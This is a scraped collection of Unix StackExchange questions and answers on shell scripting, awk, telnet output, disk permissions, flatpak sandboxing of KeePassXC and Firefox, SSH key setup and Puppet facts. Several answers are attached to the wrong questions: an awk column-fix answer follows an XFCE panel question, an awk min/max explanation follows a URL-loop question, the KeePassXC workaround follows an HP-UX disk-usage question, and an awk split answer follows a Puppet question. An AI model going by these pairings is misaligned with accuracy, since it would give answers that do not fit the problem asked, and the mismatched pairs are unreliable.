You would be better served by a shell function: doit () { local dir case $PWD/ in /home/alpha/*) dir=alpha ;; /home/beta/*) dir=beta ;; /home/gamma/*) dir=gamma ;; *) echo 'Not standing in the correct directory' >&2 return 1 esac python "/home/$dir/src/doit.py" --clean "$@"} This would set the variable dir to the string alpha , beta or gamma depending on the current working directory, or complain that you're in the wrong directory tree if the current directory is elsewhere. It then runs the Python script, utilizing the $dir value, with the --clean option and adds whatever other arguments that you've passed to the function. You would add this shell function's definition to wherever you ordinarily add aliases.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/583983", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/314716/" ] }
584,056
I have a file like below on linux folder. There should be 4 columns in file with comma separated values.But in some lines there are only 3 columns. I want to add a blank at the beginning of line when there are 3 columns. Input: col1,col2,col3,col4a1,a2,a3,a4b1,b2,b3,b4c2,c3,c4d1,d2,d3,d4 output: col1,col2,col3,col4a1,a2,a3,a4b1,b2,b3,b4,c2,c3,c4d1,d2,d3,d4 Thanks in advance
You could use awk ex. awk -F, 'NF==3 {$0=","$0} 1' file If you have a suitably recent version of GNU awk you can apply it to the file in-place using gawk -i inplace -F, 'NF==3 {$0=","$0} 1' file Otherwise, it's probably easier to use a different tool such as sed or perl . perl -i -F, -pe '$_ = "," . $_ if $#F == 2' file or perhaps sed -i'.bak' -e 's/,/,/3;t' -e 's/^/,/' file (attempt to replace the 3rd comma, and substitute a comma at the start of line if it fails).
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/584056", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/408082/" ] }
584,077
Is there any way to add application shortcuts to the default panel in Debian 10 XFCE environment? If not, are there any alternate options to achieve this? Thanks
You could use awk ex. awk -F, 'NF==3 {$0=","$0} 1' file If you have a suitably recent version of GNU awk you can apply it to the file in-place using gawk -i inplace -F, 'NF==3 {$0=","$0} 1' file Otherwise, it's probably easier to use a different tool such as sed or perl . perl -i -F, -pe '$_ = "," . $_ if $#F == 2' file or perhaps sed -i'.bak' -e 's/,/,/3;t' -e 's/^/,/' file (attempt to replace the 3rd comma, and substitute a comma at the start of line if it fails).
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/584077", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/410191/" ] }
584,081
telnet test | grep -o Unabletelnet: Unable to connect to remote host: Connection refused Only 'Unable' should be the result.
The error message outputted by telnet when it's not able to connect is printed to the standard error stream. The standard error stream is by default sent straight to the terminal. You may only pipe the standard output stream to some other command ( grep in this case). You may send the error stream to the standard output stream by means of a redirection: telnet test 2>&1 | grep -o Unable This would merge the two streams and grep would act the merged data stream. If you want to catch an error condition in telnet , it would also be possible to use the utility's exit status: if ! telnet test 2>/dev/null; then echo 'something went wrong with telnet' exit 1fiecho 'telnet ran successfully' This would exit the script if telnet returned a non-zero exit status (signalling some sort of failure). I've additionally redirected the error stream to /dev/null to discard it completely.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/584081", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/410194/" ] }
584,118
I need to create an image of a partition of a usb drive: dd if=/dev/sdb1 of=sdb1.img Is there a way to do it without sudo/su? Maybe by changing permissions on the usb drive? What would be the security implications?
Is there a way to do it without sudo/su? Maybe by changing permissions on the usb drive? If your /dev/sdb1 has permissions like: $ ls -l /dev/sdb1brw-rw---- 1 root disk 8, 17 Apr 25 17:07 /dev/sdb1 Then an option would be to add your user to the disk group: # usermod --append --groups disk username After that, the next time that the user logs in, they'll be able to read the device. Your dd should work after that. What would be the security implications? Since the user can read any disk directly, the user would have access to files owned by any user on any disk. The user would be able to not only read any disk, but would also be able to write directly to any block device file with the same permissions (g+rw) . That user could easily corrupt any filesystem by accidentally writing to those block device files. Changing permissions to disallow the disk group write permissions might have other side effects that I can't predict. As a result, if you're on a multi-user system or on a system where you care about data stored on any disk, I don't recommend you do this. Normal users aren't given access to block devices because of the security implications.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/584118", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/410219/" ] }
584,215
I am writing a simple helper function to show a sizes of the files: This is the code I have so far: find . -type f -size +10M -printf "%f -> %s B\n" The output I get is: clay-banks--Ni2fpLUgRI-unsplash.jpg -> 181794593 Bjake-nackos-_kdX2vPc33U-unsplash.jpg -> 448148323 B73-738467_nature-wallpapers-high-quality-images-hd-desktop-images.jpg -> 131115725 B However, I want to show the file sizes in MB. How should I modify this so it works like b clay-banks--Ni2fpLUgRI-unsplash.jpg -> 173 MBjake-nackos-_kdX2vPc33U-unsplash.jpg -> 427 MB73-738467_nature-wallpapers-high-quality-images-hd-desktop-images.jpg -> 125 MB
At least on GNU-based systems, you should be able to use stat and numfmt to get the desired format, ex.: find . -type f -size +10M -printf "%f -> " -exec sh -c ' stat -c "%s" "$1" | numfmt --to-unit=1048576 --format="%.0f MB"' sh {} \; Change --to-unit=1048576 to --to-unit=1000000 depending whether you want MB or MiB.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/584215", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/410332/" ] }
584,421
Given a single column file of numbers, call it f , the following Awk code will return the maximum value cat f | awk ' BEGIN {max = -inf} {if ($1>max) max=$1} END { print max } ' The same approach to get the minimum doesn't produce anything cat f | awk ' BEGIN {min = inf} {if ($1<min) min=$1} END {print min} ' But if instead of using inf , I start off with min = [some large number] , if the number is large enough, depending upon what's in the file, then the revised code works. Why doesn't inf work, and is there some way to make the min case work like the max case, without having to know what's in the file?
The actual task is best solved by initializing your max/min values not by an imaginary "smallest" or "greatest" number (which may not be implemented in the framework you are using, in this case awk ), but by initializing it using actual data. That way, it is always guaranteed to provide a meaningful result. In your case, you can use the very first value you encounter (i.e. the entry in the first line) to initialize max and min , respectively, by adding a rule NR==1{min=$1} to your awk script. Then, if the first value is already the minimum, the subsequent test will not overwrite it, and in the end the correct result will be produced. The same holds for searches of the maximum value, so in combined searches, you can state NR==1{max=min=$1} As for the reason why your approach with inf didn't work with awk whereas -inf seemed to, @steeldriver has provided a good explanation in a comment to your question, which I will also summarize for the sake of completeness: In awk , variables are "dynamically typed", i.e. everything can be a string or a number depending on use (but awk will "remember" what it was last used as and keep that information along for use in the next operation). Whenever arithmetic operations involving a variable are found in the code, awk will try to interpret the content of that variable as a number and perform the operation, from where on the variable is typed as numerical if successful. The default value for any variable that has not yet been assigned anything is the empty string, which is interpreted as 0 in arithmetic operations. The variable name(*) inf has no special meaning in awk , hence when used just so, it is an empty variable that will evaluate to 0 in an arithmetic expression such as -inf . Therefore, the "maximum search" with the max variable initialized to -inf works if your data is all positive, because -inf is simply 0 (and as such, the smallest non-negative number). In the "minimum search" problem, however, initializing min to inf will initialize the variable to the empty string, as no arithmetic operation is present that would warrant an automatic conversion of that empty string to a number. Therefore, in the later comparisons if ($1<min) min=$1 the input, $1 , is compared with a string value, which is why awk treats $1 as a string, too, and performs a lexicographical comparison rather than a numerical one. However, lexicographically, nothing is "smaller" than the empty string, and so min never gets assigned a new value. Therefore, in the END section, the statement print min prints the (still) empty string. (*) see Stephen Kitt's answer on how a string with content "inf" can actually have a meaning in awk .
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/584421", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/366321/" ] }
584,423
for a in {P02183606,P02183608,sassa}do for b in {PID,PID2,sas} do echo "http://indiafirstlife.com//onlineInsurance-rest/uploadDocument/uploadDocumentsOmniMannualPush?applicationRefNo=$a&applicationFormId=$b" donedone Expected output http://indiafirstlife.com//onlineInsurance-rest/uploadDocument/uploadDocumentsOmniMannualPush?applicationRefNo=P02183606&applicationFormId=PIDhttp://indiafirstlife.com//onlineInsurance-rest/uploadDocument/uploadDocumentsOmniMannualPush?applicationRefNo=P02183608&applicationFormId=PID2http://indiafirstlife.com//onlineInsurance-rest/uploadDocument/uploadDocumentsOmniMannualPush?applicationRefNo=sassa&applicationFormId=sas
The actual task is best solved by initializing your max/min values not by an imaginary "smallest" or "greatest" number (which may not be implemented in the framework you are using, in this case awk ), but by initializing it using actual data. That way, it is always guaranteed to provide a meaningful result. In your case, you can use the very first value you encounter (i.e. the entry in the first line) to initialize max and min , respectively, by adding a rule NR==1{min=$1} to your awk script. Then, if the first value is already the minimum, the subsequent test will not overwrite it, and in the end the correct result will be produced. The same holds for searches of the maximum value, so in combined searches, you can state NR==1{max=min=$1} As for the reason why your approach with inf didn't work with awk whereas -inf seemed to, @steeldriver has provided a good explanation in a comment to your question, which I will also summarize for the sake of completeness: In awk , variables are "dynamically typed", i.e. everything can be a string or a number depending on use (but awk will "remember" what it was last used as and keep that information along for use in the next operation). Whenever arithmetic operations involving a variable are found in the code, awk will try to interpret the content of that variable as a number and perform the operation, from where on the variable is typed as numerical if successful. The default value for any variable that has not yet been assigned anything is the empty string, which is interpreted as 0 in arithmetic operations. The variable name(*) inf has no special meaning in awk , hence when used just so, it is an empty variable that will evaluate to 0 in an arithmetic expression such as -inf . Therefore, the "maximum search" with the max variable initialized to -inf works if your data is all positive, because -inf is simply 0 (and as such, the smallest non-negative number). In the "minimum search" problem, however, initializing min to inf will initialize the variable to the empty string, as no arithmetic operation is present that would warrant an automatic conversion of that empty string to a number. Therefore, in the later comparisons if ($1<min) min=$1 the input, $1 , is compared with a string value, which is why awk treats $1 as a string, too, and performs a lexicographical comparison rather than a numerical one. However, lexicographically, nothing is "smaller" than the empty string, and so min never gets assigned a new value. Therefore, in the END section, the statement print min prints the (still) empty string. (*) see Stephen Kitt's answer on how a string with content "inf" can actually have a meaning in awk .
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/584423", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/410508/" ] }
584,521
If KeePassXC is sandboxed in a Flatpak , browsers can only access it, if they are not sandboxed, i.e. installed as an deb/rpm package or similar on the host.Sandboxing both the browser, i.e. Firefox , and KeePassXC – or at least the browser and installing KeePassXC natively, which you'd actually want for security reasons – is not possible. TL;DR: this should work out-of-the box: Firefox (host-installed), KeePassXC (flatpak from flathub) this does not: Firefox (sandboxed), KeePassXC (host or sandboxed, does not matter) So how to make that communication work?
Background If you just want the solution, you can skip this part. But for the curious, I'll explain the problems we face: KeePassXC creates an UNIX socket in $XDG_RUNTIME_DIR/kpxc_server for applications to listen too. keepassxc-proxy is started – via native messaging – by the browser (triggered by the add-on [email protected] , i.e. KeePassXC-Browser) and tries to listen on that socket to find messages. If Firefox is not sandboxed, that proxy can start as usual. The only thing it possibly needs to do is get into the KeePassXC flatpak. Flathub KeePassXC has a patch that allows the keepassxc-proxy to be started via flatpak run , i.e. Firefox can now run a That is, so far, why Firefox installed on the host does work… Now why it does not work if Firefox is installed as a flatpak: The very good official Firefox flatpak by Mozilla really does have few permissions for being a browser. E.g. it does not have any generic access to the file system (it uses portals ). Anyway, whatever it does, it cannot do one thing: Spawn a process on the host or in another flatpak . So we could solve that by making wrapper scripts and using flatpak-spawn to let Firefox escape it's sandbox. However, seeing how lovely and quite securley the Firefox sandbox is already built, I would not dare to destroy that security for such a feature. After all, from a security POV you could then also just install Firefox on the host, yet again.So glad news ahead: This solution preserves all sandboxes and security aspects! However, even if we've solved the fact of Firefox having to run the proxy, there are more problems. To spoiler, this are the main points we need to solve: Starting keepassxc-proxy by Firefox (solution: we run it inside the Firefox sandbox) Allowing Firefox to access the socket of KeePassXCNote: At that step, you can already run the variation: Firefox (sandboxed), KeePassXC (host-installed) Exposing the UNUX socket from the KeePassXC flatpak to other applications outside of the Flatpak. (solution: an symbolic link) Current workaround v1.2 Tested with: Fedora 32, org.mozilla.firefox v75 from flathub, org.keepassxc.KeePassXC v2.5.4 from flathub Starting keepassxc-proxy by Firefox Worst things first: We need the keepassxc-proxy as a binary, because we want to have it run inside of the Firefox flatpak. Good for us: it has not many depenencies and is available as a stand-alone application. So I chose the Rust proxy application (because why should not I? ). If you trust me, you can get my compiled binary below, just skip to two steps ahead. Clone the git repo and compile it (run cargo build --release ). You find the result in ./target/release .The keepassxc-proxy binary, version 211ae91 , compiled with rustc 1.43.0 (the current stable in Fedora 32) for x86_64 (and if it helps and you wanna know more that .rustc_info.json ).And altghough Rust is not (yet) totally reproducibly compiling I did got the same bit-by-bit result on two machines with Fedora 32. The SHA-256 hash is c5c4c6c011a4d64f7e4dd6c444dcc70bee74d23ffb28c9b65f7ff6d89a8f86ea .So if you are in a risky mood, you can just download my keepassxc-proxy binary here . ( hosted by GitHub ;P ) Now we need to tell Firefox about the new binary. Go to ~/.var/app/org.mozilla.firefox/.mozilla/native-messaging-hosts . Actually, the native-messaging-hosts likely does not exist yet, so do create it. Create a file org.keepassxc.keepassxc_browser.json in there, and paste in the following content: { "allowed_extensions": [ "[email protected]" ], "description": "KeePassXC integration with native messaging support, workaround for flatpaked Firefox, see https://is.gd/flatpakFirefoxKPXC", "name": "org.keepassxc.keepassxc_browser", "path": "/home/REPLACE_WITH_USERNAME/.var/app/org.mozilla.firefox/.mozilla/native-messaging-hosts/keepassxc-proxy", "type": "stdio"} Note that only absolute paths work (I guess), so replace REPLACE_WITH_USERNAME with your $USER name, so that the paths leads to it's own working dir. You see what I am doing: We now place the downloaded/compiled keepassxc-proxy in the same dir . Obviously, you could use any other path there, but this was the first one that is obviously accessible by Firefox and you have everything in one place. (If you have better suggestions, feel free to let me know.) Note: Remember to make it executable ( chmod +x ) if it is not, already. Allowing Firefox to access the socket KeePassXC, by default, creates it's socket in $XDG_RUNTIME_DIR/kpxc_server . So this is what we need to give the Firefox flatpak access to (read-only is obviously enough). Fortunately, this is easy. Just run: $ sudo flatpak override --filesystem=xdg-run/kpxc_server:ro org.mozilla.firefox Hooray!: For those, who install KeePassXC on the host (without any sandbox/flatpak), this is enough. Start KeePassXC and then Firefox and it should be able to connect. :tada:Please note the "existing problems" section at the bottom, though. Continue, if you also want to run KeePassXC in a flatpak. Exposing the UNIX socket from the KeePassXC flatpak Note: Again skip to the bullet point (point 1) below, if you don't wanna know the technical background. The flatpaked KeePassXC from Flathub creates it's Unix socket in the location flatpaks should do so, in $XDG_RUNTIME_DIR/app/org.keepassxc.KeePassXC/kpxc_server . (If it would use $XDG_RUNTIME_DIR directly like the "native" KeePassXC, it would only exist in the sandbox.) As we know, the usual keepassxc-proxy expects the file at $XDG_RUNTIME_DIR/kpxc_server . To solve this, we just create a symbolic link.As you can verify, this actually solves our problem. For some very strange reason, the Flatpak sandbox now allows Firefox (and all other flatpaks! Just FYI, be aware of that.) to see that UNIX socket file.As it should turn out later, this does not work when you move that symbolic link anywhere else (even another file name already prevents it from working – I've tried a lot of things.). However, $XDG_RUNTIME_DIR is usually deleted at shutdown. So we need to recreate it at startup/user login. Good for us there, is already a tool for that. (you could also mangle with shell scripts in your autostart of course, but that is ugly.)That's why we make use of systemd-tmpfiles . (The man page for tmpfiles.d is more useful for us actually.) Go to ~/.local/share/user-tmpfiles.d . Again, there is a high chance the user-tmpfiles.d dir does not exist yet. If so… well… you know what to do… Now download and place the following config file in there: kpxc_server.conf This is basically a config file for systemd-tmpfiles that says it to create that symbolic link for the user. Reboot, so systemd-tmpfiles can apply the changes and create the config file. (Alternatively, you can also manually run systemd-tmpfiles --user --create to apply the changes.) Hooray!: Afterwards start the KeePassXC flatpak and then Firefox and it should be able to connect. :tada: Please note the "existing problems" section below. Existing problems Firefox, for some reason, cannot see the $XDG_RUNTIME_DIR/kpxc_server file, if the file (respectively it's symbolic link target) does not exist yet.In practise, this results in one big disadvantage: You always need to start KeePassXC before Firefox . For some more strange reason, if you have this workaround setup, the usual way that you run a non-flatpaked native Firefox and connect it by spawning the proxy inside the flatpak (like flatpak run org.keepassxc.KeePassXC ) may not work. Delete the symbolic link again to make this work. Debugging tips In Firefox use about:debugging to access add-on internals. [email protected] is the add-on ID. It actually also logs failed attempts. Note there are different results (logs and visibly) when it cannot start the proxy vs when it can start the proxy, but no connection suceeds (because the UNIX socket is not there, e.g.) To manually get into the flatpak and "see" in a shell what it has access to/looks like, use something like flatpak run --command=/bin/sh org.mozilla.firefox . To check whether the socket file is accessible (a symbolic link can point to a non-existant file) just cat it and you'll see a strange error that cat cannot find a resource Things I've tried Things that do not work: Preserved for future solutions and better™ workarounds. all things in $XDG_RUNTIME_DIR/app are highly sandboxed, even with flatpak overrides I could not get the Firefox flatpak to read the content of the ../org.keepassxc.KeePassXC dir. Even with crazy symbolic links in it's own dir. (Do try it though, maybe you'll make it! At least you'll learn something. :wink:.) what works though is: You can override the KeePassXC flatpak to get access to Mozilla. Only write access possible though! Thus, if it would place the proxy there (again: symbolic links here don't work!), Firefox could also read it. The symbolic link must be created by an application outside of the sandbox. Inside of it, it's again – sandboxed – and one only visible inside of it. Final notes That took quite some time to figure it out. I do try to continue improving this workaround and find solutions in this GitHub issue . It's best to follow there, if you are interested. I've cross-posted this question and answer in the Fedora community and in the Flathub forum .
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/584521", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/146739/" ] }
584,528
My directory /var has reached 92% usage and I need to clean it.I am trying to identify where I should point at. I know that df -k gives me the % of allocation from / , but how can I get the same info inside /var ? How do I drill down to find the directory or directories that are taking up the most space? I am trying df -k /var but it is not outputing % allocation from all directores inside. I am using HP-UX. It is an old machine from work. It has no graphical UI as fas as I know.
Background If you just want the solution, you can skip this part. But for the curious, I'll explain the problems we face: KeePassXC creates an UNIX socket in $XDG_RUNTIME_DIR/kpxc_server for applications to listen too. keepassxc-proxy is started – via native messaging – by the browser (triggered by the add-on [email protected] , i.e. KeePassXC-Browser) and tries to listen on that socket to find messages. If Firefox is not sandboxed, that proxy can start as usual. The only thing it possibly needs to do is get into the KeePassXC flatpak. Flathub KeePassXC has a patch that allows the keepassxc-proxy to be started via flatpak run , i.e. Firefox can now run a That is, so far, why Firefox installed on the host does work… Now why it does not work if Firefox is installed as a flatpak: The very good official Firefox flatpak by Mozilla really does have few permissions for being a browser. E.g. it does not have any generic access to the file system (it uses portals ). Anyway, whatever it does, it cannot do one thing: Spawn a process on the host or in another flatpak . So we could solve that by making wrapper scripts and using flatpak-spawn to let Firefox escape it's sandbox. However, seeing how lovely and quite securley the Firefox sandbox is already built, I would not dare to destroy that security for such a feature. After all, from a security POV you could then also just install Firefox on the host, yet again.So glad news ahead: This solution preserves all sandboxes and security aspects! However, even if we've solved the fact of Firefox having to run the proxy, there are more problems. To spoiler, this are the main points we need to solve: Starting keepassxc-proxy by Firefox (solution: we run it inside the Firefox sandbox) Allowing Firefox to access the socket of KeePassXCNote: At that step, you can already run the variation: Firefox (sandboxed), KeePassXC (host-installed) Exposing the UNUX socket from the KeePassXC flatpak to other applications outside of the Flatpak. (solution: an symbolic link) Current workaround v1.2 Tested with: Fedora 32, org.mozilla.firefox v75 from flathub, org.keepassxc.KeePassXC v2.5.4 from flathub Starting keepassxc-proxy by Firefox Worst things first: We need the keepassxc-proxy as a binary, because we want to have it run inside of the Firefox flatpak. Good for us: it has not many depenencies and is available as a stand-alone application. So I chose the Rust proxy application (because why should not I? ). If you trust me, you can get my compiled binary below, just skip to two steps ahead. Clone the git repo and compile it (run cargo build --release ). You find the result in ./target/release .The keepassxc-proxy binary, version 211ae91 , compiled with rustc 1.43.0 (the current stable in Fedora 32) for x86_64 (and if it helps and you wanna know more that .rustc_info.json ).And altghough Rust is not (yet) totally reproducibly compiling I did got the same bit-by-bit result on two machines with Fedora 32. The SHA-256 hash is c5c4c6c011a4d64f7e4dd6c444dcc70bee74d23ffb28c9b65f7ff6d89a8f86ea .So if you are in a risky mood, you can just download my keepassxc-proxy binary here . ( hosted by GitHub ;P ) Now we need to tell Firefox about the new binary. Go to ~/.var/app/org.mozilla.firefox/.mozilla/native-messaging-hosts . Actually, the native-messaging-hosts likely does not exist yet, so do create it. Create a file org.keepassxc.keepassxc_browser.json in there, and paste in the following content: { "allowed_extensions": [ "[email protected]" ], "description": "KeePassXC integration with native messaging support, workaround for flatpaked Firefox, see https://is.gd/flatpakFirefoxKPXC", "name": "org.keepassxc.keepassxc_browser", "path": "/home/REPLACE_WITH_USERNAME/.var/app/org.mozilla.firefox/.mozilla/native-messaging-hosts/keepassxc-proxy", "type": "stdio"} Note that only absolute paths work (I guess), so replace REPLACE_WITH_USERNAME with your $USER name, so that the paths leads to it's own working dir. You see what I am doing: We now place the downloaded/compiled keepassxc-proxy in the same dir . Obviously, you could use any other path there, but this was the first one that is obviously accessible by Firefox and you have everything in one place. (If you have better suggestions, feel free to let me know.) Note: Remember to make it executable ( chmod +x ) if it is not, already. Allowing Firefox to access the socket KeePassXC, by default, creates it's socket in $XDG_RUNTIME_DIR/kpxc_server . So this is what we need to give the Firefox flatpak access to (read-only is obviously enough). Fortunately, this is easy. Just run: $ sudo flatpak override --filesystem=xdg-run/kpxc_server:ro org.mozilla.firefox Hooray!: For those, who install KeePassXC on the host (without any sandbox/flatpak), this is enough. Start KeePassXC and then Firefox and it should be able to connect. :tada:Please note the "existing problems" section at the bottom, though. Continue, if you also want to run KeePassXC in a flatpak. Exposing the UNIX socket from the KeePassXC flatpak Note: Again skip to the bullet point (point 1) below, if you don't wanna know the technical background. The flatpaked KeePassXC from Flathub creates it's Unix socket in the location flatpaks should do so, in $XDG_RUNTIME_DIR/app/org.keepassxc.KeePassXC/kpxc_server . (If it would use $XDG_RUNTIME_DIR directly like the "native" KeePassXC, it would only exist in the sandbox.) As we know, the usual keepassxc-proxy expects the file at $XDG_RUNTIME_DIR/kpxc_server . To solve this, we just create a symbolic link.As you can verify, this actually solves our problem. For some very strange reason, the Flatpak sandbox now allows Firefox (and all other flatpaks! Just FYI, be aware of that.) to see that UNIX socket file.As it should turn out later, this does not work when you move that symbolic link anywhere else (even another file name already prevents it from working – I've tried a lot of things.). However, $XDG_RUNTIME_DIR is usually deleted at shutdown. So we need to recreate it at startup/user login. Good for us there, is already a tool for that. (you could also mangle with shell scripts in your autostart of course, but that is ugly.)That's why we make use of systemd-tmpfiles . (The man page for tmpfiles.d is more useful for us actually.) Go to ~/.local/share/user-tmpfiles.d . Again, there is a high chance the user-tmpfiles.d dir does not exist yet. If so… well… you know what to do… Now download and place the following config file in there: kpxc_server.conf This is basically a config file for systemd-tmpfiles that says it to create that symbolic link for the user. Reboot, so systemd-tmpfiles can apply the changes and create the config file. (Alternatively, you can also manually run systemd-tmpfiles --user --create to apply the changes.) Hooray!: Afterwards start the KeePassXC flatpak and then Firefox and it should be able to connect. :tada: Please note the "existing problems" section below. Existing problems Firefox, for some reason, cannot see the $XDG_RUNTIME_DIR/kpxc_server file, if the file (respectively it's symbolic link target) does not exist yet.In practise, this results in one big disadvantage: You always need to start KeePassXC before Firefox . For some more strange reason, if you have this workaround setup, the usual way that you run a non-flatpaked native Firefox and connect it by spawning the proxy inside the flatpak (like flatpak run org.keepassxc.KeePassXC ) may not work. Delete the symbolic link again to make this work. Debugging tips In Firefox use about:debugging to access add-on internals. [email protected] is the add-on ID. It actually also logs failed attempts. Note there are different results (logs and visibly) when it cannot start the proxy vs when it can start the proxy, but no connection suceeds (because the UNIX socket is not there, e.g.) To manually get into the flatpak and "see" in a shell what it has access to/looks like, use something like flatpak run --command=/bin/sh org.mozilla.firefox . To check whether the socket file is accessible (a symbolic link can point to a non-existant file) just cat it and you'll see a strange error that cat cannot find a resource Things I've tried Things that do not work: Preserved for future solutions and better™ workarounds. all things in $XDG_RUNTIME_DIR/app are highly sandboxed, even with flatpak overrides I could not get the Firefox flatpak to read the content of the ../org.keepassxc.KeePassXC dir. Even with crazy symbolic links in it's own dir. (Do try it though, maybe you'll make it! At least you'll learn something. :wink:.) what works though is: You can override the KeePassXC flatpak to get access to Mozilla. Only write access possible though! Thus, if it would place the proxy there (again: symbolic links here don't work!), Firefox could also read it. The symbolic link must be created by an application outside of the sandbox. Inside of it, it's again – sandboxed – and one only visible inside of it. Final notes That took quite some time to figure it out. I do try to continue improving this workaround and find solutions in this GitHub issue . It's best to follow there, if you are interested. I've cross-posted this question and answer in the Fedora community and in the Flathub forum .
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/584528", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/410590/" ] }
584,686
I have some experience using the bash, but this command here which I saw in a tutorial caught me off guard: cat ~/.ssh/id_rsa.pub | ssh git@remote-server "mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys" I know what the command does. It takes the output of the file ~/.ssh/id_rsa.pub , then ssh s to a remote server, creates a new directory under user home called .ssh then creates a new file called authorized_keys and pours the contents of the id_rsa.pub into that file. What I couldn't figure out is, at which point contents of the id_rsa.pub file gets injected into the authorized keys file. So, I know pipe (|) takes the output to its left and feeds it to the command to the right hand side of it. But normally we use cat command like this: cat "content_to_be_added" >> file_to_be_appended so, if I'm not mistaken, contents of id_rsa.pub should get injected right before >> in order for this to work. So, how does this function exactly and why? By the way, please feel free to correct my terminology. I'd also appreciate if you can tell me if this operator here >> has a specific name.
The command cat >> ~/.ssh/authorized_keys reads from standard input (since no filename was given to cat to read from) and appends to the named file. The >> redirection operator opens the target file for appending . Using > in place of >> would have truncated (emptied) the target file before writing the data. Where does the data on standard input of that remote cat command come from? The standard input stream is inherited by cat from the remote shell. The remote shell inherits the standard input stream from ssh . The standard input for ssh comes via the pipe from the local cat command, which reads the ~/.ssh/id_rsa.pub file. The local cat is not needed in your pipeline: ssh git@remote-server 'mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys' < ~/.ssh/id_rsa.pub Note, however, that if mkdir does actually create a directory, that directory needs to have the correct permissions for ssh to work properly: ssh git@remote-server 'mkdir -p ~/.ssh && chmod 700 ~/.ssh && cat >> ~/.ssh/authorized_keys' < ~/.ssh/id_rsa.pub Or, you may just choose to fail to append the data: ssh git@remote-server 'cat >> ~/.ssh/authorized_keys' < ~/.ssh/id_rsa.pub
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/584686", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/150668/" ] }
584,919
I have a directory called outer . outer contains a directory named inner (which contains lots of files of same extension) I cd to outer . How can I delete all the files within inner but leave the directory inner remaining (but empty)?
If you want to delete a directory's contents and not the directory itself, all you need to do is tell rm to delete the contents: rm inner/* That will delete all non-hidden files in ./inner and leave the directory intact. To also delete any subdirectories, use -r : rm -r inner/* If you also want to delete hidden files, you can do (assuming you are using bash): shopt -s dotglobrm -r inner/* That last command will delete all files and all directories in inner , but will leave inner itself intact. Finally, note that you don't need to cd to outer to run any of these: $ tree -a outer/outer/├── dir└── inner ├── dir ├── file └── .hidden3 directories, 2 files I can now run rm -r outer/inner/* from my current directory, no need to cd outer , and it will remove everything except the directory itself: $ shopt -s dotglob$ rm -r outer/inner/*$ tree -a outer/outer/├── dir└── inner2 directories, 0 files
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/584919", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/50597/" ] }
584,992
We have data as below ABC|RAM|BANGALORE|100,200,300 Can we run any pivot/loop to dive above data into multiple records ABC|RAM|BANGALORE|100ABC|RAM|BANGALORE|200ABC|RAM|BANGALORE|300 As per the last column multiple values with comma delimeter , number of records should be created Is there any way we can do in linux shell ?
I wouldn't use the shell itself for this. Another awk implementation $ awk 'BEGIN{OFS=FS="|"} {split($NF,a,","); for(i in a) {$NF = a[i]; print}}' data ABC|RAM|BANGALORE|100 ABC|RAM|BANGALORE|200 ABC|RAM|BANGALORE|300 or with Miller $ mlr --nidx --fs '|' nest --explode --values --across-records --nested-fs ',' -f 4 data ABC|RAM|BANGALORE|100 ABC|RAM|BANGALORE|200 ABC|RAM|BANGALORE|300 or more compactly mlr --nidx --fs '|' nest --evar ',' -f 4 data If you really need to use a shell, then with a suitably recent bash: #!/bin/bashwhile IFS='|' read -a fields; do IFS=',' read -a vals <<<"${fields[ -1]}" unset 'fields[ -1]' for v in "${vals[@]}"; do printf '%s|' "${fields[@]}" printf '%s\n' "$v" done done < data
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/584992", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/353888/" ] }
585,007
I have a module manifest, let's say it is named as work.pp . I added a custom fact has_work in /lib/facter/work.rb . When I run puppet agent -t , and check facter -p has_work , the fact has appropriate value. However, in my work.pp file, I have a condition like this: if ($has_work) { $create_file = true } and then based on $create_file I have something like this: if ($create_file) { file { "create file": path => "/path/to/file.ini", alias => "/path/to/file.ini", ensure => file, owner => devops, mode => "0644", } However, despite of $has_work being true, no file is created on client. I'm trying to figure out why is it so.Any help is appreciated. Thanks!
I wouldn't use the shell itself for this. Another awk implementation $ awk 'BEGIN{OFS=FS="|"} {split($NF,a,","); for(i in a) {$NF = a[i]; print}}' data ABC|RAM|BANGALORE|100 ABC|RAM|BANGALORE|200 ABC|RAM|BANGALORE|300 or with Miller $ mlr --nidx --fs '|' nest --explode --values --across-records --nested-fs ',' -f 4 data ABC|RAM|BANGALORE|100 ABC|RAM|BANGALORE|200 ABC|RAM|BANGALORE|300 or more compactly mlr --nidx --fs '|' nest --evar ',' -f 4 data If you really need to use a shell, then with a suitably recent bash: #!/bin/bashwhile IFS='|' read -a fields; do IFS=',' read -a vals <<<"${fields[ -1]}" unset 'fields[ -1]' for v in "${vals[@]}"; do printf '%s|' "${fields[@]}" printf '%s\n' "$v" done done < data
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585007", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/410999/" ] }
585,008
